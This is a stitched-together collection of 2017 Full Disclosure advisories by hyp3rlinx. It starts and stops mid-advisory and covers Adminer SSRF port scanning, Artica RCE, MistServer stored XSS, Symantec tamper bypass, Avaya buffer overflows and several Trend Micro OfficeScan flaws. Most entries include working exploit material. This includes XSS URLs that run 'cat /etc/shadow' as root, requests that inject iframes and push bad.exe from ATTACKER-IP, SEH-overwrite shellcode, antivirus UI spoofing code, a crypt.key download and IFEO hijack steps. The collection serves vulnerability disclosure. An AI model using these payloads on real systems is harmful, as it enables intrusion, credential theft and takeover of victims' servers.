localhost:12322 ATTACKER-IP - - [2/Jan/2018:14:26:56 +] "GET
///?server=TARGET-IP:23= HTTP/1.1" 403 6021 "-" "-"
Details:
==
By comparing different failed error responses from Adminer when making
SSRF bogus connections, I figured out which ports are open/closed.
Port open ==> Lost connection to MySQL server at 'reading initial
communication packet
Port open ==> MySQL server has gone away
Port open ==> Bad file descriptor
Port closed ==> Can't connect to MySQL server on '';
Port closed ==> No connection could be made because the target machine
actively refused it
Port closed ==> A connection attempt failed.
This worked so well for me I wrote a quick port scanner 'PortMiner' as
a proof of concept that leverages Adminer SSRF vulnerability.
PortMiner observations:
==
No response 'read operation timed out' means the port is possibly open
or filtered and should be given a closer look if possible. This seems
to occur when scanning
Web server ports like 80, 443. However, when we get error responses
like the ones above from the server we can be fairly certain a port is
either open/closed.
Quick POC:
echo -e 'HTTP/1.1 200 OK\r\n\r\n' | nc -l -p
Use range -
Exploit/POC:
=
import socket,re,ssl,warnings,subprocess,time
from platform import system as system_name
from os import system as system_call
#Adminer Server Side Request Forgery
#PortMiner Scanner Tool
#by John Page (hyp3rlinx)
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#=
#D1rty0Tis says hi.
#timeout
MAX_TIME=32
#ports to log
port_lst=[]
#Web server response often times out but usually means ports open.
false_pos_ports=['80','443']
BANNER='''
_ __ __ _
| _ \ | | | \/ (_)
| |__) |__ _ __| |_| \ / |_ _ __ ___ _ __
| ___/ _ \| '__| __| |\/| | | '_ \ / _ \ '__|
| | | (_) | | | |_| | | | | | | | __/ |
|_| \___/|_| \__|_| |_|_|_| |_|\___|_|
'''
def info():
print "\nPortMiner depends on Error messages to determine
open/closed ports."
print "Read operations reported 'timed out' may be open/filtered.\n"
def greet():
print 'Adminer Unauthenticated SSRF Port Scanner Tool'
print 'Targets Adminer used for MySQL administration\n'
print 'by hyp3rlinx - apparition security'
print '-\n'
print 'Scan small ranges or single ports or expect to wait.\n'
print 'Do not scan networks without authorized permission.'
print 'Author not responsible for abuse/misuse.\n'
def chk_port
[FD] Artica Web Proxy v3.06 Remote Code Execution / CVE-2017-17055
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec
Vendor:
===www.articatech.com
Product:
=
Artica Web Proxy v.3.06.112216
Artica Tech offers a powerful but easy-to-use Enterprise-Class Web
Security and Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have
been developed over the past
10 years as an Open Source Project to help SMEs and public bodies
protect both their organizations
and employees from risks posed by the Internet.
Vulnerability Type:
===
Remote Code Execution
CVE Reference:
==
CVE-2017-17055
Security Issue:
Artica offers a web based command line emulator 'system.terminal.php'
(shell), allowing authenticated users to execute OS commands as root.
However, artica fails to sanitize the following HTTP request parameter
$_GET["username-form-id"] used in 'freeradius.users.php'.
Therefore, authenticated users who click an attacker supplied link or
visit a malicious webpage, can result in execution of attacker
supplied Javascript code. Which is then used to execute unauthorized
Operating System Commands (RCE) on the affected Artica Web Proxy
Server
abusing the system.terminal.php functionality. Result is attacker
takeover of the artica server.
Exploit/POC:
=
1) Steal artica Server "/etc/shadow" password file.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E
2) Write file 'PWN' to /tmp dir.
https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: November 28, 2017
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Mist Server v2.12 Unauthenticated Persistent XSS CVE-2017-16884
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
[+] ISR: ApparitionSec
Vendor:
=mistserver.org
Product:
===
MistServer v2.12
MistServer is a full-featured, next-generation streaming media toolkit
for OTT (internet streaming).
Vulnerability Type:
===
Unauthenticated Persistent XSS
CVE Reference:
==
CVE-2017-16884
Security Issue:
Unauthenticated remote attackers can inject persistent XSS payloads by
making failed HTTP authentication requests. Attacker supplied payloads
will
get stored in the server logs as failed authentication requests
alerts. Mistserver echoes back the unsanitized payloads in Mist
Servers Web interface
automatically due to automatic refresh of the UI every few seconds,
thereby, executing arbitrary attacker supplied code.
References:
https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21
Exploit/POC:
=
import requests
#INJECT IFRAME
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP\'>"}}')
#PUSH MALWARE
requests.get('http://VICTIM-IP:4242/admin/api?callback=={"authorize":{"password":"666","username":;http://ATTACKER-IP/bad.exe\'>"}}')
#EXFIL LOGS
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":;alert(document.body.innerHTML)"}}')
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: October 19, 2017
Vendor Acknowledgement : October 20, 2017
Vendor Released Fix : November 30, 2017
December 1, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Symantec Endpoint Protection (SEP) v12.1 Tamper-protection Bypass CVE-2017-6331
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
[+] ISR: ApparitionSec
Vendor:
===www.symantec.com
Product:
===
Symantec Endpoint Protection
v12.1.6 (12.1 RU6 MP5)
Symantec 12.1.7004.6500
Vulnerability Type:
===
Tamper-Protection Bypass
Denial Of Service / Message Spoof
CVE Reference:
==
CVE-2017-6331
SSG16-041
Security Issue:
Symantec Endpoint Protection (SEP), does not validate where WinAPI
messages comes from (lack of UIPI).
Therefore, malware can easily spoof messages to the UI or send
WM_SYSCOMMAND to close
the SEP UI denying end user ability to scan / run the EP AntiVirus
protection. Spoofed messages could
also potentially inform a user a scan was clean.
Unfortunately Symantecs advisory left out details of the Denial Of
Service as well as minimizing the
amount of text a malware could inject into the UI which would result
in compromising the integrity of the
Symantec Endpoint Protection Control Panel user interface.
References:
===https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory=security_advisory==20171106_00
Exploit/POC:
=
1) Compile below C program, it targets various components of SEP,
comment out what you want to send to the UI.
2) Try to open the Symantec Endpoint UI and you will be denied.
3) Or inject attacker supplied messages intructing the user the file
is clean etc.
#include
#include
#define VICTIM "DevViewer.exe"
//By HYP3RLINX
//ISR: ApparitionSec
//Symantec EP Protection - Tamper Protection Bypass Vulnerability
//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004
Symantec 12.1.7004.6500 Windows 7
//How: FindWindow / SendMessage Win32 API
//Impact: DOS / Integrity Compromised
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.
void main(void){
while(1){
HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
if(hWnd!=NULL){
//This injects arbitrary messages to SEP UI.
SetWindowText(hWnd, "*** Important Security Update, Visit:
http://PWN3D.com/EVIL.exe download and follow instructions. ***");
//This prevents a user from being able to run AV scans and
renders SEP UI useless
//SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);
}
//HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
HWND x = FindWindow(NULL, TEXT("DevViewer"));
if(x!=NULL){
SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);
}
HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0);
HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);
HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
if(x!=NULL){
SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);
}
sleep(1);
}
}
Network Access:
===
Local
Severity:
=
Medium
Disclosure Timeline:
=
Vendor Notification: July 8, 2016
Vendor acknowledged: 7/14/16
Vendor advisory : November 6, 2017
November 10, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: apparitionSec
Vendor:
=www.avaya.com
Product:
===
Avaya IP Office (IPO)
v9.1.0 - 10.1
IP Office is Avaya's global midsize solution for enterprises,
supporting up to 3,000 users at a single location with IP Office
Select editions.
For businesses with multiple locations, IP Office provides a powerful
set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry
standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.
Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN
and WAN (LAN2).
In addition to basic telephony services and voicemail, IP Office
offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call
tracking (SMDR), and system monitoring and diagnostics (System Status
Application).
Available editions: Basic, Essential, Preferred, Server, Server
Select, Server with Virtualized Software, Server/Sever Select hosted
in the Cloud.
Vulnerability Type:
===
Remote Buffer Overflow
CVE Reference:
==
CVE-2017-11309
ASA-2017-307
Security Issue:
SoftConsole.exe does not check bounds when reading server response on
making an outbound connection, resulting in a classic
Buffer Overflow exploit.
Avaya IP Office user must connect to a malicious server where a remote
attacker can then deliver the buffer overflow
payload in the server response, exploiting the SoftConsole client.
This vulnerability allows attackers to deliver and
execute arbitrary attacker supplied code on the Avaya host system.
References:
===https://downloads.avaya.com/css/P8/documents/101044086
POC Video URL:
==https://vimeo.com/224679849
Exploit/POC:
=
import struct,socket
#Log data, item 8
# Address=50E083A1
# Message= 0x50e083a1 : pop ecx # pop ebp # ret 0x04 |
{PAGE_EXECUTE_READ} [IndyCore190.bpl]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v19.0.14356.6604
#(C:\Program Files (x86)\Avaya\IP Office\SoftConsole\IndyCore190.bpl)
#50E083A1 #POP ECX POP EBP RET
'''
No SafeSEH
'''
HOST="127.0.0.1"
PORT=80
#shellcode to call wusa.exe Windows Update Standalone Installer (Tested Win 7)
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E\x08"
"\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x8B\x7B"
"\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99\x32\x17\x66\xC1"
"\xCA\x01\xAE\x75\xF7\x66\x81\xFA\x10\xF5\xE0\xE2\x75\xCF\x8B\x53"
"\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68"
"\x2E\x65\x78\x65\x68\x77\x75\x73\x61\x54\x87\x04\x24\x50\xFF\xD5"
"\xCC")
'''
calculated by taking the negative of the number and convert to hex:
in gdb
1
2
p/x -1116
$4 = 0xfba4
So now we know that our near jump is going to be \xe9\xa4\xfb\xff\xff.
'''
seh=struct.pack("<L", 0x50E149FD) #POP ECX POP EBP RET
#payload="A"*564+""+"A"*232 #control SEH here
#(gdb) p/x -112
#$1 = 0xff90
negjmp="\xeb\x90\xff\xff"
payload="A"*452+"\x90"*10+sc+"A"*5+negjmp+seh+"\x90"*226
s = socket.socket()
host = ''
s.bind((HOST, PORT))
s.listen(5)
print 'Avaya IP Office SoftConsole 9.1.0'
print '0day Remote Buffer Overflow Exploit'
print 'Discovery / exploit: hyp3rlinx\n'
print 'Listening on port 80 for Avaya client connectionz...'
while True:
conn, addr = s.accept()
conn.send(payload+'\r\n')
print 'KABOOM!!!'
conn.close()
s.close()
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: July 7, 2017
Vendor reply "under investigation" : July 7, 2017
Vendor acknowledgement of issue : July 12, 2017
CVE assigned by mitre: July 13, 2017
Vendor advisory: November 4, 2017
November 5, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any d
[FD] CVE-2017-12969 Avaya OfficeScan IPO Remote ActiveX Buffer Overflow
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt
[+] ISR: ApparitionSec
Vendor:
=www.avaya.com
Product:
===
Avaya IP Office (IPO)
v9.1.0 - 10.1
IP Office is Avaya's global midsize solution for enterprises,
supporting up to 3,000 users at a single location with IP Office
Select editions.
For businesses with multiple locations, IP Office provides a powerful
set of tools to help streamline operations, centralize management, and
reduce total cost of ownership for converged networks. Using industry
standards, IP Office enables companies to share resources, provide
improved customer service, and keep mobile employees accessible.
Provides a hybrid PBX with TDM and IP telephony and trunk support.
Provides IP routing, switching and firewall protection, between LAN
and WAN (LAN2).
In addition to basic telephony services and voicemail, IP Office
offers both hard phone and soft phone options.
Includes a robust set of tools for administration (Manager), call
tracking (SMDR), and system monitoring and diagnostics (System Status
Application).
Available editions: Basic, Essential, Preferred, Server, Server
Select, Server with Virtualized Software, Server/Sever Select hosted
in the Cloud.
Vulnerability Type:
ActiveX Remote Buffer Overflow
CVE Reference:
==
CVE-2017-12969
ASA-2017-313
Security Issue:
ViewerCtrl.ocx ActiveX Component used by Avaya IP Office (IPO) can be
exploited by remote attackers to potentially execute arbitrary
attacker supplied code. User would have to visit a malicious webpage
using InternetExplorer where the exploit could be triggered.
Clsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334}
Safe for Script: False
Safe for Init: False
ACCESS_VIOLATION
8C4A77 MOV EAX,[ECX]
SEH Chain:
---
1 8D00A3 po.dll
2 36A7E95 CIPElements.dll
3 36A8115 CIPElements.dll
4 788719 ViewerCtrl.OCX
5 788533 ViewerCtrl.OCX
6 78862A ViewerCtrl.OCX
7 6008793E mfc90u.dll
8 60089B31 mfc90u.dll
9 779858C5 ntdll.dll
(d360.1040c): Access violation - code c005 (first/second chance
not available)
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for ntdll.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for po.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for CIPElements.dll -
eax=0608ec18 ebx= ecx= edx= esi=0aa7bdd0 edi=0aa7bdd0
eip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
po!cip::po::SpecialObjects::getPresetObject+0x77:
06064a77 8b01mov eax,dword ptr [ecx] ds:002b:=
0:008> !load winext/msec
0:008> !exploitable
!exploitable 1.6.0.0
*** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for user32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for ieframe.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for iertutil.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for IEShims.dll -
*** ERROR: Symbol file could not be found. Defaulted to export
symbols for kernel32.dll -
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting
Address controls Code Flow starting at
po!cip::po::SpecialObjects::getPresetObject+0x0077
(Hash=0x6f1f914b.0xc46b7285)
The data from the faulting address is later used as the target for a branch.
References:
==https://downloads.avaya.com/css/P8/documents/101044091
Exploit/POC:
=
victimFile = "C:\Program Files (x86)\Avaya\IP Office Contact
Center\User Interface\ViewerCtrl.ocx"
prototype = "Function open ( ByVal containerId As String ) As Long"
memberName = "open"
progid = "ViewerCtrlLib.ViewerCtrl"
argCount = 1
payload=String(5142, "A")
victim.open payload
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
=
Vendor Notification: July 12, 2017
Vendor acknowlegement: July 14, 2017
CVE assigned by mitre : August 19, 2017
Vendor advisory : November 4, 2017
November 5, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that
[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Memory Corruption CVE-2017-14089
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt
[+] ISR: ApparitionSec
Vendor:
==www.trendmicro.com
Product:
OfficeScan
v11.0 and XG (12.0)*
OfficeScan protects enterprise networks from malware, network viruses,
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent
program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and
reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated
security policies and deploy updates to every agent.
Vulnerability Type:
===
Unauthorized Remote Memory Corruption
CVE Reference:
==
CVE-2017-14089
Security Issue:
Remote unauthenticated attackers that can make connection the
TrendMicro OfficeScan XG application targeting the
"cgiShowClientAdm.exe"
process can cause memory corruption issues.
References:
===https://success.trendmicro.com/solution/1118372
Exploit/POC:
=
import urllib,urllib2
from urllib2 import Request
print 'TrendMicro OfficeScan XG'
print 'Stack Memory Corruption POC'
print 'by hyp3rlinx\n'
IP="VICTIM-IP:4343"
PAYLOAD="A"*256
url =
urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe')
cookie="Cookie: serror=0; session_expired=no;
FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|;
stamp=2231521137; timestamp=1497360567; DisabledIds=.;
LogonUser=A;
ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666;
LANG=en_US; PHPSESSID=WHATEVER123; lastID=34; lastTab=-1;
theme=default; wf_CSRF_token=;
serror=0; retry=0; PHPSESSID=WHATEVERHERE; wf_CSRF_token=666;
LANG=en_US; theme=default; lastID=33; lastTab=-1"
print '\nsending packetz... \n'+ cookie
##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411")
#<== X-CSRFToken IS NOT EVEN NEEDED!
url.add_header("Content-Type", "application/x-www-form-urlencoded;
charset=utf-8")
url.add_header("Content-Length", "54")
url.add_header("Cookie ",cookie)
req=urllib2.urlopen(url)
res = urllib2.urlopen(req)
print res
Network Access:
===
Remote
Severity:
=
High
Disclosure Timeline:
Vendor Notification: June 5, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Encryption Key Disclosure CVE-2017-14083
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt [+] ISR: ApparitionSec Vendor: ==www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Unauthorized Encryption Key Disclosure CVE Reference: == CVE-2017-14083 Security Issue: Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG application which usually runs on port 4343 can download the OfficeScan XG encryption "crypt.key" file. This crypt.key is used for the OfficeScan XG encryption process. References: ===https://success.trendmicro.com/solution/1118372 e.g. In "config.php" /* * * Encryption module configurations */ $wfconf_wfcrypt_keyfile = dirname(__FILE__) . "/../repository/inc/class/common/crypt/crypt.key"; <= HERE $wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH MCRYPT_CAST_256 MCRYPT_DES ... /* * * Framework configurations */ Exploit/POC: = [root@localhost /]# wget --no-check-certificate https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key --14:59:52-- https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key Connecting to VICTIM-IP:4343... connected. WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP': Self-signed certificate encountered. HTTP request sent, awaiting response... 200 OK Length: 32 [application/octet-stream] Saving to: `crypt.key' 100%[==>] 32 --.-K/s in 0s 14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32] Network Access: === Remote Severity: = High Disclosure Timeline: = Vendor Notification: May 31, 2017 Vendor: "hotfix in progress". June 23, 2017 Vendor releases fixes / advisory : September 27, 2017 September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Change Prevention Image File Execution Bypass
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt [+] ISR: ApparitionSec Vendor: ==www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Image File Execution Bypass CVE Reference: == N/A Security Issue: OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM service that is supposed to protect OfficeScan processes like "PccNTMon.exe" from being terminated, and also prevents unauthorized arbitrary registry settings being made to the protected machine even by an Administrator. However, we can easily bypass by exploiting Windows Image File Execution Options (IFEO) to hijack the service process. IFEO has been used by malwares for some time to prevent process from running or execute a process of an attackers choosing in place of the process the user expects. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options All an attacker needs to do is create a registry key in IFEO with the same name as "TMBMSRV.exe" which is used by the "Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After creating this registry key we create a "string value" named debugger pointing to say "calc.exe", we wait and once system reboots BOOM! References: ===https://success.trendmicro.com/solution/1118372 Exploit/POC: = Reproduction: 1) Open registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options 2) Create a new Key with no name 3) Create a new string value under the new key named "debugger" with value of c:\Windows\system32\calc.exe 4) Rename the created key to TMBMSRV.exe 5) Reboot system Done! We can then not only Kill TM but write to TrendMicro whitelist key in the registry for our evil binary to be left alone in peace. Network Access: === Local Severity: = High Disclosure Timeline: = Vendor Notification: June 28, 2017 Vendor Reply: "Officescan Build 1222 which is affected by this bug was already pulled and is no longer available for public download" Vendor Reply: "created hotfixes for product improvement." September 28, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution CVE-2017-14084
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt [+] ISR: ApparitionSec Vendor: ==www.trendmicro.com Product: OfficeScan v11.0 and XG (12.0)* OfficeScan protects enterprise networks from malware, network viruses, web-based threats, spyware, and mixed threat attacks. An integrated solution, OfficeScan consists of the OfficeScan agent program that resides at the endpoint and a server program that manages all agents. The OfficeScan agent guards the endpoint and reports its security status to the server. The server, through the web-based management console, makes it easy to set coordinated security policies and deploy updates to every agent. Vulnerability Type: === Man-in-the-Middle (MITM) Remote Code Execution CVE Reference: == CVE-2017-14084 Security Issue: === MITM vector exists as the CURL request used by Send() function in "HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set to false. CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust was issued by a CA you trust and it's genuine. 